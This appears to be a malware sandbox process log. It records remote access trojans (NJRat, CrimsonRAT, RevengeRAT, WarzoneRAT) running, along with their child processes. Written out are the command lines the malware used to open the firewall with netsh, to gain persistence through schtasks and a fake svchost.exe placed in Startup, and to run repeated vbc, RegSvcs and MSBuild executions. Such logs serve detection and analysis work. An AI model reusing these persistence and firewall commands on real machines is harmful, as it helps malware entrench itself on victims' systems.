"C:\Users\Admin\Downloads\NJRat.exe"

C:\Users\Admin\Downloads\CrimsonRAT.exe

"C:\Users\Admin\Downloads\CrimsonRAT.exe"

C:\Users\Admin\Downloads\CrimsonRAT.exe

"C:\Users\Admin\Downloads\CrimsonRAT.exe"

C:\ProgramData\Hdlharas\dlrarhsiva.exe

"C:\ProgramData\Hdlharas\dlrarhsiva.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE

C:\ProgramData\Hdlharas\dlrarhsiva.exe

"C:\ProgramData\Hdlharas\dlrarhsiva.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lez4qvtp.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7214.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6120206E2E57417489CC5C21FE6E746.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y10uxcsq.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72DF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFCCAE8D1863E401A8C5BF2FAD33B5CDE.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vlc3aipl.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES739B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF83A07F0A9EC4358AC9DF5B228FC559.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xclkbl-s.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7437.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5B53060A767642D5BAD7C3F86FC8AD56.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\noklzuac.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74C4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2A63C4C122344DF6BD8B34BFAEE25A6.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gzx6q4o5.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7570.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE376DC9813E74C9187DE535CDFC33BA.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iboznvtg.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75ED.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3597E38B45924308A055D2A115223717.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1y9vvug0.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES765A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcED5B2FB5BE204D8AA1BF6861ECFBF4.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rcv53xrr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7735.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCFFA0F3E84A84B7C966294A97EE43691.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zrkadol9.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77D1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcABF9B84113644AB7AC801EDBF982593E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w8jr4wsp.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES789C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7C466AE3B5CB4C25AD2CAD8637F3533.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ugeodnid.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7938.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc10CC050DE24A4F1AA2C399C3EB6CE5BD.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9qdtg91x.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA017A8419484B8D8B90E2C4CECD7478.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qtkkcsoi.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AA0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEB314D6972554CC1ADFB94284741336E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s5xpbss5.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B2C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2E1AF3E18D5C458892FD4C6DAE64FB33.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e83zhpn-.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C17.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc435E2A9456154AB1948334CB999B6D4E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v6wjos64.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CE2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAE32FB188E174C1D8451C982D7DBB859.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lssic93r.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D8E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3AE81288C6A342DCA3811C9DE3376AB6.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\p2xfrlyp.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF4411FC84674D9CB26AC08F59DD927.TMP"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0h74oqkv.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F05.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3EA38C6087E14075BBB98CD5B342E439.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\u2mlauku.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FB1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc872ECB81EF08488A8DA4ED8F2FDE419D.TMP"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k9hci6sr.cmdline"

C:\Users\Admin\Downloads\RevengeRAT.exe

"C:\Users\Admin\Downloads\RevengeRAT.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2382.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc93A56BFC9A364F6897E537AE9FD750D7.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7d0hc2ze.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Users\Admin\Downloads\RevengeRAT.exe

"C:\Users\Admin\Downloads\RevengeRAT.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2509.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBDBC547E71AF4EEE82D1DB7A4BFC6E77.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xryfkc4b.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2632.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF9214ACF9754D6799B4AC2A1B59DDE.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jaaeswpo.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES26BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9D070CE68711455BA883044FA7020D0.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d8i7emlc.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2789.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD4C4595BBF464ABD9E10A9789A5F494B.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\13ht2sct.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES28B2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCAEAB3E128344752827B62C5E9713D47.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zq_o7xz4.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES298D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB007BC9CD6BE4DAA94A684C83C6A3F13.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2y6t-vbb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A58.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA6B28D28D88A461D9E6D9C6626EBA454.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fdm3hj0s.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B23.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1CAC5829FED8455CBEAB5AC574FA66E8.TMP"

C:\Users\Admin\Downloads\WarzoneRAT.exe

"C:\Users\Admin\Downloads\WarzoneRAT.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e0hqya2n.cmdline"

C:\Users\Admin\Downloads\WarzoneRAT.exe

"C:\Users\Admin\Downloads\WarzoneRAT.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BEE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8EBBAFA518BD4FC4ADED4FCA5AAE18B6.TMP"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2BCF.tmp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2C7B.tmp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\Downloads\NJRat.exe

"C:\Users\Admin\Downloads\NJRat.exe"

C:\Users\Admin\Downloads\NJRat.exe

"C:\Users\Admin\Downloads\NJRat.exe"

C:\Users\Admin\Downloads\CrimsonRAT.exe

"C:\Users\Admin\Downloads\CrimsonRAT.exe"

C:\Users\Admin\Downloads\CrimsonRAT.exe

"C:\Users\Admin\Downloads\CrimsonRAT.exe"

C:\ProgramData\Hdlharas\dlrarhsiva.exe

"C:\ProgramData\Hdlharas\dlrarhsiva.exe"

C:\ProgramData\Hdlharas\dlrarhsiva.exe

"C:\ProgramData\Hdlharas\dlrarhsiva.exe"

